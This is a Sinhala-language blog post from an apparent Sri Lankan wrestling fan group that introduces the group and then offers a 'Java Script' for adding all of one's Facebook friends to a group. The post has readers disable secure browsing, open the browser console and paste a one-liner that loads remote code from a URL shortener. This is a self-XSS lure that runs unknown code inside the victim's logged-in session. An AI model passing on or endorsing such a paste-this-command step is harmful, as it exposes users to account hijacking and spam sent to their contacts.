ආයුබෝවන් ඔබ සම සාදරයෙන් පිලිගනිමි

ආයුබෝවන් !!!! ඔබ සම අපගේ නවතම බ්ලොග් එකට ඉතා සාදරයෙන් බක්තියෙන් යුතුව පිලිගනිමි .............අප මෙම බ්ලොග් එක සෑදීමෙන් අදහස් කලන්නේ ඔබ සැමට එදිනෙදා තිබු රෙස්ලින් මැච් වල අලුත්ම තොරතුරු ලබාදීමටත් ඔබට අවශ්‍ය පින්තුර ගැනීමටත් තවත් බොහෝ දේ ඔබ වෙත ඉදිරිපත් කිරීමටය.....


SLWE යනු කුමක්ද ? ,,,

ඔබ අප සාම දෙනාම වාගේ දන්නා රෙස්ලින් අපගේ ලංකාවේ සිටින ෆේස්බුක් මිතුරන් හා එක්ව ගෙන යන ලද රෙස්ලින් ගෘප් එකකි මෙහිදී කරනු ලබන්නේ අලුත්ම රෙස්ලින් තොරතුරු සමාජයට ඉදිරිපත් කරනවා මෙන්ම විනෝදාස් වාදය උදෙසා එකිනෙක අතර තරග පවත් වීමය.... අපගේ ගෘප් එක SLWE කියන අනුවර්ත නාමයෙන් හැදින්වෙන අතර එහි නියම අන්තර්ගත නම වනුයේ
                           Sri Lankan Wrestling Entertainment (ශ්‍රී ලංකාවේ රෙස්ලින්)

අපගේ ගෘප් එක අරඹ කලේ 2011 වෙනි වර්ෂයේය එයිටත් ප්‍රථම මෙම ගෘප් එක තිබුනද එකල ඔව්න් ගෘප් එකට කට්ටිය එකතු කිරීමට ප්රියයක් දැක්වුයේ නැත අදවන විටදී මෙම්බර්ස්ලා 65000+ පසු කර ඇත....

SLWE එකට මෙම්බර්ස්ලා අඩු මොකද ?....,,,

අද වන විට ගෘප් වලට මෙම්බර්ස්ලා ඇඩ් කරනුයේ අලුතෙන් හොයාගත් JAVA SCRIPT මගින්ය. අනෙක් ගෘප් මෙම ක්‍රමය බාවිතා කර ඔව්න්ගේ ගෘප් එකට සියලු මෙම්බර්ස්ලා ඇඩ් කර ගැනීමට හැකිවන අකාරයෙන්  ස්ක්‍රිප්ට් හැදීමට පෙලබුනි.... මෙය ඔබට අත්හද බැලීමට හැකි ක්‍රමයක් වන්නේ ඔබගේ ෆෙක්‌ අකව්න්ට් එකකින් ඔබ ගොස් ගෘප් එකකට කට්ටිය ඇඩ් කලන්න ඉන් පසු ඔබ ඔබේ අකාව්න්ට් එකට ගොස් බලන්න එවිට ඔබගේ නොටිෆිකේෂන් වල ඇවිත් තිබෙන්නේ රෙස්ලින්ග් ගෘප් එකකට ඇතුළු කල බවයි මෙය සම පුරන වංචා සහගත සමාජය නොමග යවන වැඩකි... මෙයටද අප සමුහය විසින් විසදුමක් සොයාගත්හ.. එනම් මෙම JAVA SCRIPT සාදන වෙලාවට අපට අවශ්‍ය ගෘප් එක ලින්කුවක් ඇතුළු කල යුතුය. අප විසින් සාදන ලද SCRIPT එක  සදහා අප එවැනි ලින්කුවක් අන්තර්ගත නොකිරීම හෙයින් ඔබට අවශ්‍ය පරිදී ඔබගේ කටයුතු කර ගැනීමට හැකිය.........

ඔබට අපගේ JAVA SCRIPT එක අවශ්‍යනම් එය පහල ඇත..........  

document.body.appendChild(document.createElement('script')).src='http://goo.gl/SZ4Ax';
 ඔබට මෙය මගින් ගෘප් එකට යහළුවන්ව ඇතුළු කරන ආකාරය පිළිබද දැනුමක් නොමැතිනම් පහල තියෙන දේ කියව එය අවබෝද කරගන්න........




  නැවතත් !... නැවතත් !!... නැවතත් !!!...

ඔබේ සියලුම මිතුරන් එක ක්ලික් එකෙන් ඔබේ ගෲප් එකට එකතු කරන්න ආසද? කලින් ඔබ බාවිතා කල ස්ක්‍රිප්ට් එක අතර මගදි වැඩ කරේ නැද්ද? මෙන්න ඔබට නැවතත් ඒ ක්‍රමයටම ක
ස්ටිය ඇඩ් කරගන්න අවස්ථාව.

1. පහත ඉරි අතර ඇති සම්පුර්ණ code එකම copy කරගන්න.
________________________________________________________
document.body.appendChild(document.createElement('script')).src='http://goo.gl/SZ4Ax';
___________________________________________________________

2. Account setting > Security > Secure browsing off කරන්න.

3. මිතුරන් එකතු කල යුතු group එකට යන්න. https හරහා නොවිය යුතුයි.

4. Firefox නම් Ctrl + Shift + K එකවර ඇතුලත් කර Chrome නම් F12 ඇතුලත් කර අවසානයට ඇති "Console" තෝරන්න

5. කලින් copy කරගත් code එක එතන ඇති code ඇතුලත් කල හැකි ස්ථානයේ paste කර Enter key ඇතුලත් කරන්න.

ඔයාලට අමාරු උනාද ගුගල් ක්‍රෝම් වල ස්ක්‍රිප්ට් එක පේස්ට් කලන්න
එහෙනම් මෙන්න මේ වීඩියෝ එක බලන්නකෝ එතකොට තේරෙයි 
http://youtu.be/jmVf-fE0cgI





0 අදහස්:

Post a Comment

ඔයාලට හිතෙන දේ කියන්නකෝ